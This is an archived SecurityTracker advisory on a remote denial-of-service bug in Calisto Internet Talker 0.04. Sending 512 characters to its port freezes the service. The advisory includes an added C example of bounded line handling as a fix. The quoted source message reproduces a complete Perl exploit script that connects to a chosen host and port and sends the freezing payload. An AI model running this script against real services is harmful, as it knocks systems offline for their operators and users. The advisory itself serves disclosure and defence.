SecurityTracker.com
Category:   Application (Generic)  >   Calisto
Vendors:   Howkins, Peter et al
Calisto Internet Talker Bug Lets Remote Users Crash the Service
SecurityTracker Alert ID:  1005700
SecurityTracker URL:  http://securitytracker.com/id/1005700
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Nov 25 2002
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 0.04
Description:   A denial of service vulnerability was reported in the Calisto Internet talker. A remote user can cause the service to freeze.

SecurityFreaks reported that a remote user can connect to the talker service port and send 512 characters to the service to cause it to freeze. A manual restart is reportedly required.

Demonstration exploit code is provided in the Source Message and on Packetstorm at:

http://packetstorm.decepticons.org/0211-exploits/SF-talkischeap.pl

Impact:   A remote user can cause the service to lock up.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.arcsite.de/hp/flibble/calisto/
Cause:   Boundary error
Underlying OS:   Linux (Any), UNIX (Any)

Message History:   None.
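
The advisory lists the cause as a boundary error triggered by 512 characters sent to the talker port. The following is an added example, not Calisto's code and not part of the advisory: a bounded line accumulator for a line-based service that rejects an over-long line and keeps serving. The names `struct conn`, `conn_feed`, `probe_then_line_ok` and the 256-byte limit are assumptions made for illustration.

```c
#include <string.h>

#define LINE_MAX_LEN 256           /* assumed limit, not a Calisto constant */
struct conn {                      /* hypothetical per-connection state */
    char   buf[LINE_MAX_LEN + 1];  /* +1 for the terminating NUL */
    size_t len;
    int    discarding;             /* set while skipping an over-long line */
};
enum feed_result { FEED_NEED_MORE, FEED_LINE, FEED_TOO_LONG };

/* Consume data[0..n) up to the first completed line or the first byte over
 * the limit; *used tells the caller where to resume. Never writes past buf. */
enum feed_result conn_feed(struct conn *c, const char *data, size_t n, size_t *used) {
    for (size_t i = 0; i < n; i++) {
        if (c->discarding) {                   /* drop the tail of a bad line */
            if (data[i] == '\n') c->discarding = 0;
            continue;
        }
        if (data[i] == '\n') {
            if (c->len > 0 && c->buf[c->len - 1] == '\r') c->len--;
            c->buf[c->len] = '\0';
            c->len = 0;
            *used = i + 1;
            return FEED_LINE;
        }
        if (c->len == LINE_MAX_LEN) {          /* bound check before the write */
            c->len = 0;
            c->discarding = 1;
            *used = i + 1;
            return FEED_TOO_LONG;              /* caller may warn or disconnect */
        }
        c->buf[c->len++] = data[i];
    }
    *used = n;
    return FEED_NEED_MORE;
}

/* Constructed input: 512 bytes with no newline, then an ordinary line. */
int probe_then_line_ok(void) {
    struct conn c = {0};
    char probe[512];
    size_t used = 0;
    memset(probe, 'A', sizeof probe);
    if (conn_feed(&c, probe, sizeof probe, &used) != FEED_TOO_LONG) return 0;
    if (conn_feed(&c, probe + used, sizeof probe - used, &used) != FEED_NEED_MORE) return 0;
    if (conn_feed(&c, "\nhello\r\n", 8, &used) != FEED_LINE) return 0;
    return strcmp(c.buf, "hello") == 0;
}
int main(void) { return probe_then_line_ok() ? 0 : 1; }
```

A connection that never sends a newline stays in the discarding state with fixed memory use, so a server built this way would still pair it with an idle timeout.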


 Source Message Contents

Date:  Mon, 25 Nov 2002 00:46:51 -0500
Subject:  Calisto Internet Talker Version 0.04 Remote Denial of Service


http://packetstorm.decepticons.org/0211-exploits/SF-talkischeap.pl


#!/usr/bin/perl
#
# S e c u r i t y F r e a k s
#  www.securityfreaks.com
#
# Calisto Internet Talker Version 0.04 Remote Denial of Service
#
#
# This exploit will not cause Calisto to crash but rather cause it 
# to freeze until manually restarted. This actually works out better 
# because Calisto comes with an autorun script that would restart it 
# should it crash anyway.
#
# [ subversive[at]linuxmail.org ] - *31/10/2002*


use IO::Socket;


$data = "A";
$size = "512";
$freeze .= $data x $size;

while($_ = $ARGV[0], /^-/) {
    shift;       
    last if /^--$/;
    /^-h/ && do { $host = shift; };
    /^-p/ && do { $port = shift; };
}

if(!$host != 0) {

print <<"ACTIONSSPEAKLOUDERTHANWORDS";
   
   SF-talkischeap.pl by subversive - www.securityfreaks.com
   Calisto Internet Talker Version 0.04 Remote Denial of Service
  

   Usage :  $0 -h <host> -p <port>

ACTIONSSPEAKLOUDERTHANWORDS
exit;

}

my $sock = new IO::Socket::INET ( Proto    => "tcp",
                                  PeerAddr => $host,
                                  PeerPort => $port,
                                );
die "\nCould not connect to $host : $!\n" unless $sock;

print $sock "$freeze";
close($sock);
exit;



 
 



Copyright 2012, SecurityGlobal.net LLC